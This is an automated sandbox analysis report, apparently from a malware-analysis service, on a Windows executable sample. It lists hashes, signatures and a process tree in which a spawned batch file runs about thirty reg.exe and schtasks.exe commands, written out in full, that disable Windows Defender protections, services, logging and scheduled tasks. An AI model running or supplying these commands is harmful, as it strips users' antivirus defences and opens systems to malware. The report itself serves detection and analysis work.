Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240508-en -
resource tags
arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system -
submitted
22/05/2024, 19:16
Static task
static1
Behavioral task
behavioral1
Sample
6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe
Resource
win7-20240508-en
General
-
Target
6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe
-
Size
91KB
-
MD5
6853ce9c7809878d2c43b55ab7bea3d9
-
SHA1
1b5498e69666c89285474493b799324948c06c47
-
SHA256
a714c2806f81699ee34724b89f5a33c35ce8e1988c98492cd125ec7fae2932d4
-
SHA512
b917b2dddda9bd2bbb8f8cb0fde79fd8eb5416ea90c1fac5c08d97a29971dffe067ceb7bf54702eec7cc7ca9b0c81c0f28d128e7c85e68f338405396020fa407
-
SSDEEP
1536:Tr7ftfkS5g9YOms+gZcQipICdXkNDqLLZX9lItVGL++eIOlnToIfVwgl3X:TnFfHgTWmCRkGbKGLeNTBfVN
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" reg.exe Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" reg.exe -
Modifies security service 2 TTPs 1 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4" reg.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2036 wrote to memory of 2880 2036 6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe 29 PID 2036 wrote to memory of 2880 2036 6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe 29 PID 2036 wrote to memory of 2880 2036 6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe 29 PID 2036 wrote to memory of 2880 2036 6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe 29 PID 2880 wrote to memory of 2912 2880 cmd.exe 30 PID 2880 wrote to memory of 2912 2880 cmd.exe 30 PID 2880 wrote to memory of 2912 2880 cmd.exe 30 PID 2880 wrote to memory of 2928 2880 cmd.exe 31 PID 2880 wrote to memory of 2928 2880 cmd.exe 31 PID 2880 wrote to memory of 2928 2880 cmd.exe 31 PID 2880 wrote to memory of 1924 2880 cmd.exe 32 PID 2880 wrote to memory of 1924 2880 cmd.exe 32 PID 2880 wrote to memory of 1924 2880 cmd.exe 32 PID 2880 wrote to memory of 1220 2880 cmd.exe 33 PID 2880 wrote to memory of 1220 2880 cmd.exe 33 PID 2880 wrote to memory of 1220 2880 cmd.exe 33 PID 2880 wrote to memory of 2580 2880 cmd.exe 34 PID 2880 wrote to memory of 2580 2880 cmd.exe 34 PID 2880 wrote to memory of 2580 2880 cmd.exe 34 PID 2880 wrote to memory of 2808 2880 cmd.exe 35 PID 2880 wrote to memory of 2808 2880 cmd.exe 35 PID 2880 wrote to memory of 2808 2880 cmd.exe 35 PID 2880 wrote to memory of 1332 2880 cmd.exe 36 PID 2880 wrote to memory of 1332 2880 cmd.exe 36 PID 2880 wrote to memory of 1332 2880 cmd.exe 36 PID 2880 wrote to memory of 1312 2880 cmd.exe 37 PID 2880 wrote to memory of 1312 2880 cmd.exe 37 PID 2880 wrote to memory of 1312 2880 cmd.exe 37 PID 2880 wrote to memory of 2804 2880 cmd.exe 38 PID 2880 wrote to memory of 2804 2880 cmd.exe 38 PID 2880 wrote to memory of 2804 2880 cmd.exe 38 PID 2880 wrote to memory of 2780 2880 cmd.exe 39 PID 2880 wrote to memory of 2780 2880 cmd.exe 39 PID 2880 wrote to memory of 2780 2880 cmd.exe 39 PID 2880 wrote to memory of 1140 2880 cmd.exe 40 PID 2880 wrote to memory of 1140 2880 cmd.exe 40 PID 2880 wrote to memory of 1140 2880 cmd.exe 40 PID 2880 wrote to memory of 3064 2880 cmd.exe 41 PID 2880 wrote to memory of 3064 2880 cmd.exe 41 PID 2880 wrote to memory of 3064 2880 cmd.exe 41 PID 2880 wrote to memory of 3060 2880 cmd.exe 42 PID 2880 wrote to memory of 3060 2880 cmd.exe 42 PID 2880 wrote to memory of 3060 2880 cmd.exe 42 PID 2880 wrote to memory of 2608 2880 cmd.exe 43 PID 2880 wrote to memory of 2608 2880 cmd.exe 43 PID 2880 wrote to memory of 2608 2880 cmd.exe 43 PID 2880 wrote to memory of 2364 2880 cmd.exe 44 PID 2880 wrote to memory of 2364 2880 cmd.exe 44 PID 2880 wrote to memory of 2364 2880 cmd.exe 44 PID 2880 wrote to memory of 2644 2880 cmd.exe 45 PID 2880 wrote to memory of 2644 2880 cmd.exe 45 PID 2880 wrote to memory of 2644 2880 cmd.exe 45 PID 2880 wrote to memory of 2700 2880 cmd.exe 46 PID 2880 wrote to memory of 2700 2880 cmd.exe 46 PID 2880 wrote to memory of 2700 2880 cmd.exe 46 PID 2880 wrote to memory of 2712 2880 cmd.exe 47 PID 2880 wrote to memory of 2712 2880 cmd.exe 47 PID 2880 wrote to memory of 2712 2880 cmd.exe 47 PID 2880 wrote to memory of 2732 2880 cmd.exe 48 PID 2880 wrote to memory of 2732 2880 cmd.exe 48 PID 2880 wrote to memory of 2732 2880 cmd.exe 48 PID 2880 wrote to memory of 2696 2880 cmd.exe 49 PID 2880 wrote to memory of 2696 2880 cmd.exe 49 PID 2880 wrote to memory of 2696 2880 cmd.exe 49 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe"C:\Users\Admin\AppData\Local\Temp\6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\31BA.tmp\31BB.tmp\31BC.bat C:\Users\Admin\AppData\Local\Temp\6853ce9c7809878d2c43b55ab7bea3d9_JaffaCakes118.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2880 -
C:\Windows\system32\reg.exereg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f3⤵PID:2912
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f3⤵PID:2928
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f3⤵PID:1924
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f3⤵PID:1220
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2580
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2808
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1332
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:1312
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2804
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f3⤵PID:2780
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f3⤵PID:1140
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f3⤵PID:3064
-
-
C:\Windows\system32\reg.exereg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f3⤵PID:3060
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2608
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f3⤵PID:2364
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable3⤵PID:2644
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable3⤵PID:2700
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable3⤵PID:2712
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable3⤵PID:2732
-
-
C:\Windows\system32\schtasks.exeschtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable3⤵PID:2696
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f3⤵PID:2648
-
-
C:\Windows\system32\reg.exereg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f3⤵PID:2604
-
-
C:\Windows\system32\reg.exereg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f3⤵PID:2632
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f3⤵PID:2340
-
-
C:\Windows\system32\reg.exereg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f3⤵PID:2816
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2616
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2164
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2744
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f3⤵PID:2784
-
-
C:\Windows\system32\reg.exereg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f3⤵
- Modifies security service
PID:2688
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD58760b15c6d12ecc70594fc8db876c68c
SHA1b1d47a27bf45db9955f07c773a5a334e3b528a97
SHA2569a3d9f84626d1443b0e1fc1afe22cc4045c20714b98838e94542991039cf8463
SHA5120463204ebabf6465ba3be44b31dc235ba240f1899b41336655a3f361932b8225326d8ab7c53130d4ded9412193d5967f805221212b964d6a54492d0f2c331dee